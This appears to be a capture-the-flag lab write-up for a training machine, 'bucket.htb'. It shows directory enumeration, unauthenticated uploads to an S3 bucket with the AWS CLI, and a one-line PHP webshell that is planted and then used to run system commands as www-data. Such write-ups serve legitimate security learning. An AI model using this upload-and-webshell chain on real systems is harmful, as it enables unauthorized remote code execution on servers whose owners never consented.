3 :80 s3.bucket.htb
http://s3.bucket.htb/ | http://s3.bucket.htb/adserver/
{"status": "running"}
http://s3.bucket.htb/adserver/index.html
Returns same page as http://bucket.htb/
$ gobuster dir -u http://s3.bucket.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 80
===============================================================
/health (Status: 200) [Size: 54]
/shell (Status: 200) [Size: 0]
/shell.php (Status: 500) [Size: 158]
/shell.html (Status: 500) [Size: 158]
/shell.txt (Status: 500) [Size: 158]
http://s3.bucket.htb/health
{
"services": {
"s3": "running",
"dynamodb": "running"
}
}
http://s3.bucket.htb/shell/
DynamoDB JavaScript Shell
$ sudo apt install awscli
Using https://docs.aws.amazon.com/cli/latest/userguide/cli-services-s3-commands.html
$ aws s3 --endpoint-url http://s3.bucket.htb ls
2021-11-12 16:05:03 adserve
$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver
PRE images/
2021-11-12 16:09:04 5344 index.html
$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver/images/
2021-11-12 16:09:04 37840 bug.jpg
2021-11-12 16:09:04 51485 cloud.png
2021-11-12 16:09:04 16486 malware.png
# nothing here, trying to write data to s3
$ echo "kashz" > kashz.txt
$ aws s3 --endpoint-url http://s3.bucket.htb cp kashz.txt s3://adserver/kashz.txt
upload: ./kashz.txt to s3://adserver/kashz.txt
$ aws s3 --endpoint-url http://s3.bucket.htb ls s3://adserver/
PRE images/
2021-11-12 16:09:04 5344 index.html
2021-11-12 16:10:26 6 kashz.txt
# text file is uploaded not visible using http://bucket.htb/kashz.txt
# testing .html
$ aws s3 --endpoint-url http://s3.bucket.htb cp kashz.html s3://adserver/kashz.html
upload: ./kashz.html to s3://adserver/kashz.html
$ curl http://bucket.htb/kashz.html
kashz
# wolf's web.php didn't work but simple webshell works
$ cat k.php
<?php echo system($_GET["cmd"]); ?>
$ aws s3 --endpoint-url http://s3.bucket.htb cp k.php s3://adserver/
upload: ./k.php to s3://adserver/k.php
# for some reason, this was coming
$ curl http://bucket.htb/k.php
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache/2.4.41 (Ubuntu) Server at bucket.htb Port 80</address>
</body></html>
$ curl http://bucket.htb/k.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
# shell gets deleted; downloading msfvenom shell, chmod 777 and executing.
$ curl http://bucket.htb/k.php -G --data-urlencode "cmd=whoami;id;hostname;uname -a"
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bucket
Linux bucket 5.4.0-48-generic #52-Ubuntu SMP Thu Sep 10 10:58:49 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
Last updated